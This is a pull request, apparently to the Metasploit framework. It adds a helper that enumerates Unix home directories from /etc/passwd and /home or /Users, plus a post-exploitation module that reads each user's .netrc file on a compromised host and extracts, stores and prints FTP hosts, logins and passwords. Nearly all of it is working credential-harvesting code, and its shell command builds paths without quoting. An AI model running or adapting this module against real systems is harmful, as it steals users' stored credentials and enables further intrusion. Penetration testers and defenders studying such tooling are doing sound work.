### PR TITLE
Loot .netrc files, generic enum_user_directories

### DIFF
--- a/lib/msf/core/post/unix/enum_user_dirs.rb
+++ b/lib/msf/core/post/unix/enum_user_dirs.rb
@@ -1,0 +1,33 @@
+module Msf
+class Post
+module Unix
+	include ::Msf::Post::Common
+
+	# returns all user directories found
+	def enum_user_directories
+		user_dirs = []
+
+		# get all user directories from /etc/passwd
+		read_file("/etc/passwd").each_line do |passwd_line|
+			user_dirs << passwd_line.split(/:/)[5]
+		end
+
+		# also list other common places for home directories in the event that
+		# the users aren't in /etc/passwd (LDAP, for example)
+		case session.platform
+		when 'osx'
+			user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" }
+		else
+			user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" }
+		end
+
+		user_dirs.flatten!
+		user_dirs.sort!
+		user_dirs.uniq!
+		user_dirs.compact!
+
+		user_dirs
+	end
+end
+end
+end

--- a/modules/post/multi/gather/netrc_creds.rb
+++ b/modules/post/multi/gather/netrc_creds.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post
 				'Name'          => 'UNIX Gather credentials saved in .netrc files',
 				'Description'   => %q{Post Module to obtain credentials saved for FTP and other services in .netrc},
 				'License'       => MSF_LICENSE,
-				'Author'        => [ 'Jon Hart <jhart@spoofed.org>' ],
+				'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>' ],
 				'Platform'      => [ 'bsd', 'linux', 'osx', 'unix' ],
 				'SessionTypes'  => [ 'shell' ]
 			))

--- a/modules/post/multi/gather/netrc_creds.rb
+++ b/modules/post/multi/gather/netrc_creds.rb
@@ -1,0 +1,75 @@
+require 'msf/core'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix/enum_user_dirs'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Unix
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'UNIX Gather credentials saved in .netrc files',
+				'Description'   => %q{Post Module to obtain credentials saved for FTP and other services in .netrc},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'Jon Hart <jhart@spoofed.org>' ],
+				'Platform'      => [ 'bsd', 'linux', 'osx', 'unix' ],
+				'SessionTypes'  => [ 'shell' ]
+			))
+	end
+
+	def run
+		creds = []
+		# walk through each user directory
+		enum_user_directories.each do |user_dir|
+			netrc_file = user_dir + "/.netrc"
+			cred = { :file => netrc_file }
+			# read their .netrc
+			cmd_exec("test -r #{netrc_file} && cat #{netrc_file}").each_line do |netrc_line|
+				# parse it
+				netrc_line.strip!
+				# get the machine name
+				if (netrc_line =~ /machine (\S+)/)
+					# if we've already found a machine, save this cred and start over
+					if (cred[:host])
+						creds << cred
+						cred = { :file => netrc_file }
+					end
+					cred[:host] = $1
+				end
+				# get the user name
+				if (netrc_line =~ /login (\S+)/)
+					cred[:user] = $1
+				end
+				# get the password
+				if (netrc_line =~ /password (\S+)/)
+					cred[:pass] = $1
+				end
+			end
+			# save whatever remains of this last cred if it is worth saving
+			creds << cred if (cred[:host] and cred[:user] and cred[:pass])
+		end
+
+		# store all found credentials
+		creds.each do |cred|
+			report_netrc_creds(cred, cred[:file])
+		end
+	end
+
+	# Report FTP auth info +auth+ found in +file+
+	def report_netrc_creds(auth, file)
+		# report if we found something
+		if (auth[:host] and (auth[:user] or auth[:pass]))
+			auth = {
+				:port => 21,
+				:sname => 'ftp',
+				:type => 'password',
+				:active => true
+			}.merge(auth)
+			report_auth_info(auth)
+			print_good("FTP credentials: user=#{auth[:user]}, pass=#{auth[:pass]}, host=#{auth[:host]} from #{file}")
+		end
+	end
+end


### PR DESCRIPTION
Loot the credentials found in users .netrc files.  There is a ton of duplication happening in the post modules related to enumerating user home directories, so rather than let that keep happening, I wrote enum_user_directories.

This code has the same problem as my mount.smbfs loot code in that it doesn't properly handle hosts that are not Host objects when connected to a database.  How can I fix that?
